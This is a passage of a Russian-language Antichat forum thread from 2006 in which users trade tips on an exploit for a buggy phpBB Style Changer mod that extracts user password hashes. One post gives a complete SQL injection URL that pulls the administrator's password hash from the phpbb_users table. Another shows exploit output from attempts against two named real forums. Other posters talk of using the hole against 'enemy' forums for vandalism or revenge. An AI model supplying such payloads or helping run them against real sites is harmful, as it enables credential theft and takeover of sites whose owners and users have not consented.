ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 07.02.2006, 02:04
Inferno
Участник форума
Регистрация: 30.12.2005
Сообщений: 155
Провел на форуме:
2714612

Репутация: 31
По умолчанию

Цитата:
Сообщение от syntacsis  
Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается
Реально я уже перерыл больше сотни и токо на 2х работает эта бага!
 
Ответить с цитированием

  #32  
Старый 07.02.2006, 02:06
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Цитата:
Сообщение от syntacsis  
Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается
Это я слепой или ты ????
где ты здесь мод увидел ????

Может быть разные релизы phpBB 2.0.19 к примеру там за другой месяц или ещё что-то там но никак не уязвимость модов....

У меня трёт аж на ура....
 
Ответить с цитированием

  #33  
Старый 07.02.2006, 02:14
madman
Новичок
Регистрация: 25.01.2006
Сообщений: 4
Провел на форуме:
60691

Репутация: 0
По умолчанию

Редкая кнешна бага, но всё ж работает. Молоца.
 
Ответить с цитированием

  #34  
Старый 07.02.2006, 02:54
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128

Репутация: 43
По умолчанию

Цитата:
Сообщение от Nova  
Это я слепой или ты ????
не я

Цитата:
Сообщение от Nova  
где ты здесь мод увидел ????
А в сплоите по-русски написано:
phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT
Вот он и работает только там, где этот стайл ченджер установлен
 
Ответить с цитированием

  #35  
Старый 07.02.2006, 06:43
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Врубился уже.
Мало где это стоит=(
 
Ответить с цитированием

  #36  
Старый 07.02.2006, 13:04
D4rkness
Новичок
Регистрация: 07.02.2006
Сообщений: 2
Провел на форуме:
8994

Репутация: 0
По умолчанию

Попробывал , с исправлением сплойта от K1borg'а , пишет
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: пусто .
Почему может быть ? Пробую на http://forum.sfaction.net , или на http://allgsm.com.ru/forum/ , не на одном не прет .
 
Ответить с цитированием

  #37  
Старый 07.02.2006, 14:51
ViPYC
Новичок
Регистрация: 25.01.2006
Сообщений: 3
Провел на форуме:
277521

Репутация: 0
По умолчанию

Цитата:
Сообщение от D4rkness  
Попробывал , с исправлением сплойта от K1borg'а , пишет
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: пусто .
Почему может быть ? Пробую на http://forum.sfaction.net , или на http://allgsm.com.ru/forum/ , не на одном не прет .
Ну тебе же русским языком объяснили и разжевали, что сплоит работает на форумах где стоит бажный мод Style Changer\Viewer
Для справки: этот мод позволяет менять скин для форума прямо с главной страницы не заходя в настройки профиля.

А вообще, как уже предлагали выше, пользуйся вручную
Код HTML:
http://somesite/someforum/index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2/*
Где последняя цифра в коде - это Id пользователя, сейчас там стоит 2

Так что enjoy

Последний раз редактировалось ViPYC; 07.02.2006 в 14:53..
 
Ответить с цитированием

  #38  
Старый 07.02.2006, 15:02
Fraerok
Новичок
Регистрация: 06.02.2006
Сообщений: 11
Провел на форуме:
120705

Репутация: 0
По умолчанию

Блин жаль что не везде работает! Покачто ещё не 1 форума не нашёл где стоит эта шляпа!
 
Ответить с цитированием

  #39  
Старый 07.02.2006, 15:13
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

Да уж не самый удачный сплойт для пхпбб,кста вышла новая пага-всем СМОТРЕТЬ
Думаю,что для неприятельского форума самое,то.Да и дырка будет еше долго жить)
 
Ответить с цитированием

  #40  
Старый 07.02.2006, 15:39
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Интересный сплойт. Но только для вандализма =(.
Кроме мести ничего интересного.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit TANZWUT Форумы 4 10.06.2008 20:18
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Форумы 11 01.02.2007 12:21
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Форумы 6 26.10.2006 21:30
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ